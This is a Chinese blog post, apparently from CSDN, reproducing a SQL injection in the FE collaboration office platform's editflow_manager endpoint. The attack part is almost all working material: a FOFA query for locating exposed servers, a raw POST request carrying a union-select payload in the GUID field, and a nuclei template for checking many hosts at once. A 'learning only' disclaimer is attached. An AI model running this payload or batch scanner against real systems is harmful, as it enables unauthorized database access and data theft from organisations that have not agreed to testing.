致远互联FE协作办公平台editflow_manager存在sql注入漏洞

最新推荐文章于 2024-07-24 19:42:49 发布
最新推荐文章于 2024-07-24 19:42:49 发布
阅读量366 收藏 6
点赞数 9
文章标签: sql 数据库 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62352348/article/details/135609408
版权

免责声明:

本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!

漏洞描述

致远互联FE协作办公平台editflow_manager存在sql注入漏洞

fofa语句

title="FE协作办公平台" || body="li_plugins_download"

漏洞复现

打开页面

1705314606389.png

构造payload

1705314588843.png

POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

nuclei批量验证

1705314520250.png

id: zhiyuan-FE-editflow_manager-sqli

info:
  name: 致远互联FE协作办公平台editflow_manager存在sql注入漏洞
  author: changge
  severity: info
  description: 致远互联FE协作办公平台editflow_manager存在sql注入漏洞
  metadata:
    fofa-query: title="FE协作办公平台" || body="li_plugins_download"
  reference:
    - https://
  tags: tags

http:
  - raw:
      - |-
        POST /sysform/003/editflow_manager.js%70 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        Connection: close
        Content-Length: 41
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip

        option=2&GUID=-1'+union+select+111*222--+

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "status_code == 200 && contains(body,'24642')"

微信公众号:AY长歌

github poc总汇地址:GitHub - AYcg/poc

长歌1001
关注
  • 9
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
致远互联FE协作办公平台 editflow_manager.jsp SQL注入漏洞(含批量验证poc)
weixin_43567873的博客
04-18 73
致远互联FE协作办公平台 editflow_manager.jsp SQL注入漏洞(含批量验证poc)
致远互联FE协作办公平台 SQL注入漏洞复现
0xSec
12-08 1024
致远互联FE协作办公平台 editflow_manager.jsp、validate.jsp等接口处存在SQL注入漏洞,未经身份验证的攻击者可以通过此漏洞获取数据库敏感信息,深入利用可获取服务器权限。
致远互联FE协作办公平台 editflow_manager.jsp SQL注入漏洞
Keepb1ue的博客
12-25 2046
致远互联FE协作办公平台是一款为企业提供全方位协同办公解决方案的产品。它集成了多个功能模块,旨在帮助企业实现高效的团队协作、信息共享和文档管理。致远互联FE协作办公平台editflow_manager存在sql注入漏洞,攻击者可以获得敏感信息。2.部署Web应用防火墙,对数据库操作进行监控。app=“致远互联-FE”1.升级至系统最新版本。
致远互联FE协作办公平台 editflow_manager.jsp 存在SQL注入漏洞
qq_39894062的博客
04-17 593
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!本星球坚持每天分享一些攻防知识,包括攻防技术、网络安全漏洞预警脚本、网络安全渗透测试工具、解决方案、安全运营、安全体系、安全培训和安全标准等文库。目前仅需一杯咖啡的价格,欢迎进来白嫖,不满意三天退款。本星主已加入几十余个付费星球,定期汇聚高质量资料及工具进行星球分享。
【1day】复现飞企互联 FE业务协作平台editflow_manager文件SQL注入漏洞
记录并分享学习安全的知识点..
12-12 675
​ 飞企互联Feiqi Hulian)是一家提供FE(Front End)业务协作平台的公司。FE业务协作平台是针对前端开发团队而设计的工具,旨在提高团队协作效率、优化工作流程,并支持团队成员之间的沟通和协作。飞企互联 FE业务协作平台editflow_manager文件存在SQL注入漏洞,攻击者通过在Web应用程序的输入字段中注入恶意的SQL代码,从而在后台数据库中执行未经授权的操作。
漏洞复现】飞企互联-FE企业运营管理平台——SQL注入
LongL_GuYu的博客
06-28 631
飞企互联-FE企业运营管理平台是一个基于云计算、智能化、大数据、物联网、移动互联网等技术支撑的云工作台。其`treeXml.jsp`接口存在sql注入,恶意攻击者可能会向数据库发送构造的恶意SQL查询语句
【复现】FE企业运营管理平台 SQL注入漏洞_59
fushuang333的博客
02-26 1101
【复现】FE企业运营管理平台 SQL注入漏洞​,攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。
漏洞复现】飞企互联-FE企业运营管理平台-editflow-manager-sql注入
知黑而守白
01-18 120
飞企互联FE企业运营管理平台是一款基于先进技术的云工作台,采用云计算、智能化、大数据、物联网和移动互联网等技术,以支撑企业的数字化转型。飞企互联FE企业运营管理平台中的 editflow_manager 接口存在SQL注入漏洞,该漏洞使得攻击者可以通过构造精心设计的恶意SQL语句,成功执行未经授权的数据库操作。此漏洞可能导致敏感信息泄露、数据库被篡改或其他安全风险。
EDITFLOW 固体流量检测传感器.pdf
10-11
EDITFLOW 固体流量检测传感器pdf,EDITFLOW 固体流量检测传感器
MySql 主从同步会不会影响到SQL执行速度?
weixin_44892327的博客
07-24 801
作用:负责将主库的二进制日志(binary log)数据传输到从库。工作方式:当从库连接到主库时,主库会为每个连接的从库开启一个 Binlog Dump 线程。这个线程从主库的二进制日志中读取日志记录,并将其发送给从库。Binlog Dump 线程:将二进制日志传输给从库。Binlog Dump GTID 线程(在启用 GTID 模式时):处理 GTID 相关的复制任务。
SQL进阶:解锁高级特性,深化数据洞察
WayneYalejk的博客
07-24 389
掌握了SQL的基础知识后,进一步探索其高级特性将帮助您更高效地处理复杂数据,深化数据分析的广度和深度。本文将带您领略SQL的高级功能,包括窗口函数、存储过程、触发器以及高级查询技巧等,让您在数据处理的道路上更进一步。通过这两篇文章,读者可以从SQL的基础知识逐步深入到高级特性,全面掌握SQL在数据处理和分析中的强大能力。
sql server 连接报错error 40
只会helloworld的小白啊的博客
07-24 257
Microsoft.Data.SqlClient.SqlException (0x80131904): A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL S
SQLynx数据库管理工具
core815的专栏
07-24 342
SQLynx数据库管理工具
在 Windows 上安装 PostgreSQL
the_beginner的博客
07-24 433
选择额外的安装项(这里我选了一个JDBC驱动包,方便DBeaver访问)安装界面会指定服务程序和库两个路径,可以自己手动选择。官网直接提供exe安装包,没有手动安装的压缩包。
SQL进阶技巧:如何使用差值累计计算思想巧解数学中递归计算问题
石榴姐yyds
07-23 561
本文给出了一种利用SQL语言如何解决数学上递归问题。解决问题的核心在于对差值累计计算的认识,差值累计计算的本质也就是数学中的迭代计算思想在SQL语言中的体现。本文中所描述的问题需要将上一行的计算结果拿出来放到下一行继续叠加,按照直观的思路需要用lag函数去取上一行值但是lag函数获取的往往都是明确的结果值,而这种需要动态计算,于是会走到递归计算的误区中,而需求中所描述的计算方式就是递归的思路,容易产生误解,但仔细推导我们不难发现其实就是每行按照固定的公式算出差值的累加,即 字段X的累计值减去字段Y的累计值等
Dav_笔记10:Using SQL Plan Management之4
Dav_2099的博客
07-23 483
数据库清除超过53周未使用的计划,由该计划的SMB中存储的LAST_EXECUTED时间戳标识。您可以使用计划名称(plan_name)
sqlalchemy使用json_unquote函数的mysql like查询
ithongchou的博客
07-23 1311
为您自己的数据库连接信息,并根据实际表结构修改模型类。函数查询MySQL JSON字段可以通过使用。下面是一个示例,假设有一个名为。请确保替换示例代码中的数据库连接字符串(在SQLAlchemy中使用。的表,其中包含一个名为。
使用sqlalchemy查询mysql的JSON字段
ithongchou的博客
07-23 178
首先,你需要定义一个与表格对应的模型类。
Qt基础 | QSqlTableModel 的使用
最新发布
zwcslj的博客
07-24 859
Q_OBJECTprivate://数据库连接//数据模型//选择模型//数据映射//自定义数据代理,性别//自定义数据代理,部门//打开数据表//获取字段名称,填充“排序字段”的comboBoxpublic:// QTableView的SelectionModel的行发生了变化,进行处理private::用于加载数据库驱动和建立与数据库之间的连接:用于指定某个数据表 ,作为数据表的数据模型。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值